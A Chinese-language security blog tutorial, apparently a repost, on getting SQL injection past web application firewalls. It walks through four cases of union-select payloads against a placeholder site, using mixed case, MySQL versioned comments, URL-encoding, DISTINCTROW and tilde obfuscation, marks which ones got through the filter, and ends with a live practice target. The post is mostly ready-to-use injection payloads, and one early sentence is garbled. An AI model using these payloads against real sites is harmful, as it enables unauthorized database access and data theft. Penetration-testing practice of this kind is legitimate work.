sql注入系列之(bypass waf 1)
2020-05-15 15:02:10 Author: www.secpulse.com(查看原文) 阅读量:471 收藏

文章作者:小椰树

今天,我们将讨论如何在SQL注入中绕过Web应用程序防火墙。本篇文章有点长,所以耐心阅读。

我们大多数人在渗透测试的过程中都会遇到WAF,绕过不分析这部分词是被firewall.so WAF绕过之前你首先要检查的话,一部分是被防火墙***

现在我讲说一下我在渗透测试过程中遇到的一些例子:

例1:

http://www.site.com/php?id=2 uNiOn-- -  [waf]
http://www.site.com/php?id=2 SeLeCt -- - [no waf]

在这里防火墙拦截了"uNiOn"关键词

http://www.site.com/php?id=2 /*!50000uNiOn*/ select 1,2,3,4,5-- -

注:使用大写和小写的组合有时会绕过WAF

“所以我们可以使用大写和小写的组合”,例如:uNiOn SeLeCt 等等

例2:

http://www.site.com/php?id=2 uNiOn-- - [no waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt [waf]

在这里的防火墙拦截了uNiOn 跟SeLeCt 组合

我们可以尝试如下:

http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- -
http://www.site.com/php?id=2 uNiOn%23%0ASeLeCt 1,2,3,4,5-- -

还有:% 23 = > URL编码的形式#,% 0a = >换行

http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- - [waf]
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt 1,2,3,4,5-- -

例3:

http://www.site.com/php?id=2 uNiOn-- - [waf]
http://www.site.com/php?id=2 SeLeCt-- - [no waf]
http://www.site.com/php?id=2 uNiOn SeLeCt-- - [waf]

来让我们尝试bypass 一下:

http://www.site.com/php?id=2 /*!50000uNiOn*/ SeLeCt-- - [waf]
http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt-- - [waf]

url encoding 编码一下:

http://www.site.com/php?id=2 %75nIOn SeLeCt -- -[waf]
http://www.site.com/php?id=2 %75nIOn %73eLeCt-- - [no waf]
这里 %75 => u and %73 => s   {url encoded from}

例4:

http://www.site.com/php?id=2

来让我们尝试一下


http://www.site.com/php?id=2 /*!50000union*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1-- - [no waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2-- - [waf]
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2-- - (no waf)
http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2,~~3,~~4,~~5-- - [bypassed]
或者                              
http://www.site.com/php?id=2 uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]

最后的作业:

学习了这么多东西,来尝试一下bypass的挑战吧,注入链接如下:

http://zixem.altervista.org/SQLi/level3.php?item=3

文章作者:小椰树

官方网站:www.ms08067.com

本文作者:Ms08067安全实验室

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/130896.html


文章来源: https://www.secpulse.com/archives/130896.html
如有侵权请联系:admin#unsafe.sh